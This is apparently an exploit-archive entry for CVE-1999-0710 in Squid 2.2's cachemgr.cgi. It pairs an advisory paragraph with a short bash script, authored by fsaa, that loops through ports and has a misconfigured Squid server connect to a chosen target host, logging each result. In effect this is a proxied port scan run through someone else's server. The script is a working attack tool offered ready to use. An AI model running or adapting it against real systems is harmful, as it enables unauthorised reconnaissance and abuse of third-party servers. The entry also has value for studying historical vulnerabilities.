Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection
Author: fsaa
type: remote
platform: cgi
port:
date_added: 1999-07-23
date_updated: 2012-08-13
verified: 1
codes: CVE-1999-0710;OSVDB-28
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/2059/info
The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port, which it then tries to connect to. If a webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established.
#!/bin/bash -x
# Port scanning using a misconfigured squid
# using open apache
# Usage miscachemgr host_vuln host_to_scan end_port
# Concept: Jacobo Van Leeuwen & Francisco S�a Mu�oz
# Coded by Francisco S�a Mu�oz
# IP6 [Logic Control]
PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='
mkdir from_$1_to_$2
while [ $PORT -lt $3 ]; do
# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1
lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1
done